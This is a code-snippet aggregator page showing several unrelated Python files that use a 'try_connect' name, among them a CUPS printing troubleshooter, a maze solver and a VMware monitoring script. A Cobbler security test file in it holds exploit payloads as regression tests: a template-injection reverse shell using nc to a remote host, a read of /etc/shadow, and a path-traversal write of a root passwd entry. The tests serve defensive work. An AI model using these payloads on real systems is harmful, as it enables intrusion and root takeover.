Best Python code snippet using slash
CheckNetworkServerSanity.py
Source:CheckNetworkServerSanity.py  
1#!/usr/bin/python32## Printing troubleshooter3## Copyright (C) 2008, 2009, 2010, 2011, 2014 Red Hat, Inc.4## Authors:5##  Tim Waugh <twaugh@redhat.com>6## This program is free software; you can redistribute it and/or modify7## it under the terms of the GNU General Public License as published by8## the Free Software Foundation; either version 2 of the License, or9## (at your option) any later version.10## This program is distributed in the hope that it will be useful,11## but WITHOUT ANY WARRANTY; without even the implied warranty of12## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the13## GNU General Public License for more details.14## You should have received a copy of the GNU General Public License15## along with this program; if not, write to the Free Software16## Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.17from gi.repository import Gtk18import cups19import os20import smburi21import socket22import subprocess23from timedops import TimedSubprocess, TimedOperation24from .base import *25try:26    import smbc27except:28    pass29class CheckNetworkServerSanity(Question):30    def __init__ (self, troubleshooter):31        Question.__init__ (self, troubleshooter, "Check network server sanity")32        troubleshooter.new_page (Gtk.Label (), self)33    def display (self):34        # Collect useful information.35        self.answers = {}36        answers = self.troubleshooter.answers37        if ('remote_server_name' not in answers and38            'remote_server_ip_address' not in answers):39            return False40        parent = self.troubleshooter.get_window ()41        server_name = answers['remote_server_name']42        server_port = answers.get('remote_server_port', 631)43        try_connect = False44        if server_name:45            # Try resolving the hostname.46            try:47                ai = socket.getaddrinfo (server_name, server_port)48                resolves = [family_socktype_proto_canonname_sockaddr[4][0] for49                             family_socktype_proto_canonname_sockaddr in ai]50                try_connect = True51            except socket.gaierror:52                resolves = False53            self.answers['remote_server_name_resolves'] = resolves54            ipaddr = answers.get ('remote_server_ip_address', '')55            if resolves:56                if ipaddr:57                    try:58                        resolves.index (ipaddr)59                    except ValueError:60                        # The IP address given doesn't match the server name.61                        # Use the IP address instead of the name.62                        server_name = ipaddr63                        try_connect = True64            elif ipaddr:65                server_name = ipaddr66                try_connect = True67        else:68            server_name = answers['remote_server_ip_address']69            # Validate it.70            try:71                ai = socket.getaddrinfo (server_name, server_port)72                resolves = [family_socktype_proto_canonname_sockaddr1[4][0] for73                             family_socktype_proto_canonname_sockaddr1 in ai]74            except socket.gaierror:75                resolves = False76            self.answers['remote_server_name_resolves'] = resolves77            try_connect = True78        self.answers['remote_server_try_connect'] = server_name79        if (try_connect and80            answers.get ('cups_device_uri_scheme', 'ipp') in ['ipp',81                                                              'http',82                                                              'https']):83            if answers.get ('cups_device_uri_scheme') == 'https':84                encryption = cups.HTTP_ENCRYPT_REQUIRED85            else:86                encryption = cups.HTTP_ENCRYPT_IF_REQUESTED87            try:88                self.op = TimedOperation (cups.Connection,89                                          kwargs={"host": server_name,90                                                  "port": server_port,91                                                  "encryption": encryption},92                                          parent=parent)93                c = self.op.run ()94                ipp_connect = True95            except RuntimeError:96                ipp_connect = False97            self.answers['remote_server_connect_ipp'] = ipp_connect98            if ipp_connect:99                try:100                    self.op = TimedOperation (c.getPrinters, parent=parent)101                    self.op.run ()102                    cups_server = True103                except:104                    cups_server = False105                self.answers['remote_server_cups'] = cups_server106                if cups_server:107                    cups_printer_dict = answers.get ('cups_printer_dict', {})108                    uri = cups_printer_dict.get ('device-uri', None)109                    if uri:110                        try:111                            self.op = TimedOperation (c.getPrinterAttributes,112                                                      kwargs={"uri": uri},113                                                      parent=parent)114                            attr = self.op.run ()115                            self.answers['remote_cups_queue_attributes'] = attr116                        except:117                            pass118        if try_connect:119            # Try to see if we can connect using smbc.120            context = None121            try:122                context = smbc.Context ()123                name = self.answers['remote_server_try_connect']124                self.op = TimedOperation (context.opendir,125                                          args=("smb://%s/" % name,),126                                          parent=parent)127                dir = self.op.run ()128                self.op = TimedOperation (dir.getdents, parent=parent)129                shares = self.op.run ()130                self.answers['remote_server_smb'] = True131                self.answers['remote_server_smb_shares'] = shares132            except NameError:133                # No smbc support134                pass135            except RuntimeError as e:136                (e, s) = e.args137                self.answers['remote_server_smb_shares'] = (e, s)138            if context is not None and 'cups_printer_dict' in answers:139                uri = answers['cups_printer_dict'].get ('device-uri', '')140                u = smburi.SMBURI (uri)141                (group, host, share, user, password) = u.separate ()142                accessible = False143                try:144                    self.op = TimedOperation (context.open,145                                              args=("smb://%s/%s" % (host,146                                                                     share),147                                                    os.O_RDWR,148                                                    0o777),149                                              parent=parent)150                    f  = self.op.run ()151                    accessible = True152                except RuntimeError as e:153                    (e, s) = e.args154                    accessible = (e, s)155                self.answers['remote_server_smb_share_anon_access'] = accessible156        # Try traceroute if we haven't already.157        if (try_connect and158            'remote_server_traceroute' not in answers):159            try:160                self.op = TimedSubprocess (parent=parent, close_fds=True,161                                           args=['traceroute', '-w', '1',162                                                 server_name],163                                           stdin=subprocess.DEVNULL,164                                           stdout=subprocess.PIPE,165                                           stderr=subprocess.PIPE)166                self.answers['remote_server_traceroute'] = self.op.run ()167            except:168                # Problem executing command.169                pass170        return False171    def collect_answer (self):172        return self.answers173    def cancel_operation (self):...security_test.py
Source:security_test.py  
...14from cobbler.modules.authentication import pam15# ==================== Start tnpconsultants ====================16# SPDX-FileCopyrightText: 2021 Nicolas Chatelain <nicolas.chatelain@tnpconsultants.com>17@pytest.fixture18def try_connect():19    def try_connect(url) -> xmlrpc.client.ServerProxy:20        xmlrpc_server = xmlrpc.client.ServerProxy(url)21        return xmlrpc_server22    return try_connect23@pytest.fixture(autouse=True)24def setup_profile(try_connect, create_kernel_initrd, fk_kernel, fk_initrd):25    cobbler_api = try_connect("http://localhost/cobbler_api")26    shared_secret = get_shared_secret()27    token = cobbler_api.login("", shared_secret)28    folder = create_kernel_initrd(fk_kernel, fk_initrd)29    kernel_path = os.path.join(folder, fk_kernel)30    initrd_path = os.path.join(folder, fk_kernel)31    # Create a test Distro32    distro = cobbler_api.new_distro(token)33    cobbler_api.modify_distro(distro, "name", "security_test_distro", token)34    cobbler_api.modify_distro(distro, "arch", "x86_64", token)35    cobbler_api.modify_distro(distro, "kernel", str(kernel_path), token)36    cobbler_api.modify_distro(distro, "initrd", str(initrd_path), token)37    cobbler_api.save_distro(distro, token)38    # Create a test Profile39    profile = cobbler_api.new_profile(token)40    cobbler_api.modify_profile(profile, "name", "security_test_profile", token)41    cobbler_api.modify_profile(profile, "distro", "security_test_distro", token)42    cobbler_api.save_profile(profile, token)43    yield44    cobbler_api.remove_profile("security_test_profile", token)45    cobbler_api.remove_distro("security_test_distro", token)46def test_arbitrary_file_disclosure_1(setup_profile, try_connect):47    # Arrange48    cobbler_api = try_connect("http://localhost/cobbler_api")49    # Act50    profiles = cobbler_api.get_profiles()51    target = profiles[0]["name"]52    try:53        result = cobbler_api.generate_script(target, "", "/etc/shadow")54        # Assert this NOT succeeds55        assert not result.startswith("root")56    except xmlrpc.client.Fault as e:57        # We have no way of exactly knowing what is in there but if its a ValueError we most likely caught the exploit58        # before something happened.59        assert "ValueError" in e.faultString60def test_template_injection_1(setup_profile, try_connect):61    # Arrange62    exploitcode = "__import__('os').system('nc [tnpitsecurity] 4242 -e /bin/sh')"63    cobbler_api = try_connect("http://localhost/cobbler_api")64    # Act65    profiles = cobbler_api.get_profiles()66    target = profiles[0]["name"]67    try:68        print("[+] Stage 1 : Poisoning log with Cheetah template RCE")69        result_stage_1 = cobbler_api.generate_script(70            target, "", "{<%= " + exploitcode + " %>}"71        )72        print("[+] Stage 2 : Rendering template using an arbitrary file read.")73        result_stage_2 = cobbler_api.generate_script(74            target, "", "/var/log/cobbler/cobbler.log"75        )76        # Assert this NOT succeeds77        assert not result_stage_1.startswith("__import__")78        # We should never get to stage two79    except xmlrpc.client.Fault as e:80        # We have no way of exactly knowing what is in there but if its a ValueError we most likely caught the exploit81        # before something happened.82        assert "ValueError" in e.faultString83def test_arbitrary_file_write_1(setup_profile, try_connect):84    # Arrange85    cobbler_api = try_connect("http://localhost/cobbler_api")86    exploit = b"cha:!:0:0:cha:/:/bin/bash\n"87    # Act88    result = cobbler_api.upload_log_data(89        "../../../../../../etc",90        "passwd",91        len(exploit),92        100000,93        base64.b64encode(exploit),94    )95    # Assert this NOT succeeds96    assert result is False97# ==================== END tnpconsultants ====================98# ==================== START ysf ====================99# SPDX-FileCopyrightText: 2022 ysf <nicolas.chatelain@tnpconsultants.com>...solver.py
Source:solver.py  
...16    row = []17    for x in range(width):18        row.append(make_cell(lines[y][x], (x, y)))19    graph.append(row)20def try_connect(here, x, y):21    if (0 <= x < width) and (0 <= y < height): # in bounds22        there = graph[y][x]23        if there['contents'] != '#':24            # print("from {} to {} {}".format(here['pos'], x, y))25            here['neighbors'].append(there)26# hook up neighbors27for y in range(height):28    for x in range(width):29        here = graph[y][x]30        try_connect(here, x, y-1)31        try_connect(here, x, y+1)32        try_connect(here, x-1, y)33        try_connect(here, x+1, y)34# find start and end nodes35start, end = {}, {}36for y in range(height):37    for x in range(width):38        here = graph[y][x]39        if here['contents'] == 's':40            start = here41            print("start {} {}".format(x, y))42        if here['contents'] == 'e':43            print("end {} {}".format(x, y))44            end = here45# # print graph46# for row in graph:47#     for col in row:...engine.py
Source:engine.py  
1""" engines/engine """2import os3import subprocess4from vmwareweb.engines.authentications import SSHClient, ssh_cli5from vmwareweb.engines.response_collections import host_cmd_vmid, host_vrt, collection, initialization, vrt_unreachable6from vmwareweb import app7from vmwareweb.engines.send_email import alert, successful_autostart, bad_autostart8import paramiko9import time10import yaml11import logging12yaml_dir = os.path.abspath(os.path.dirname(__file__))13stream = open(os.path.join(yaml_dir, 'mp.yaml'))14mp = yaml.load(stream, Loader=yaml.FullLoader)15port = mp['port']16user = mp['user']17password = mp['password']18esx_list = [('vim-cmd vmsvc/power.on', 'ESX67')]19protocol_list = [('True SSL', 'SSL'), ('True TLS', 'TLS')]20def monitoring():21    """22        This function is listen IPs and will be check availability servers if server down then23        will be initialization response to auto start copy VM on other host and will be call SSH Client function24    """25    logging.info("!!! Engine start !!! {}".format(time.strftime("%d.%m.%y %H:%M")))26    try_connect = 027    initialization()28    while True:29        try:30            for vrt, host in host_vrt.items():31                answer = subprocess.call(['ping', '-c', '3', vrt])32                if answer != 0:33                    collection()34                    time.sleep(15)35                    try_connect += 136                    logging.info("!!! Try firs reconnection {} !!!".format(time.strftime("%d.%m.%y %H:%M")))37                    if try_connect == 2:38                        vrt_unreachable.append(vrt)39                        with app.app_context():40                            alert()41                    if try_connect >= 3:42                        for vm, cmd in host_cmd_vmid.items():43                            if vm == vrt:44                                ssh_cli(SSHClient(host, port, user, password), cmd)45                                try_connect = 046                                successful_autostart()47                    else:48                        continue49        except TimeoutError:50            print('Connection timed out')51            logging.info("SSH Connection time out {}".format(time.strftime("%d.%m.%y %H:%M")))52        except paramiko.ssh_exception.NoValidConnectionsError:53            print('NoValidConnectionsError')...Learn to execute automation testing from scratch with LambdaTest Learning Hub. Right from setting up the prerequisites to run your first automation test, to following best practices and diving deeper into advanced test scenarios. LambdaTest Learning Hubs compile a list of step-by-step guides to help you be proficient with different test automation frameworks i.e. Selenium, Cypress, TestNG etc.
You could also refer to video tutorials over LambdaTest YouTube channel to get step by step demonstration from industry experts.
Get 100 minutes of automation test minutes FREE!!
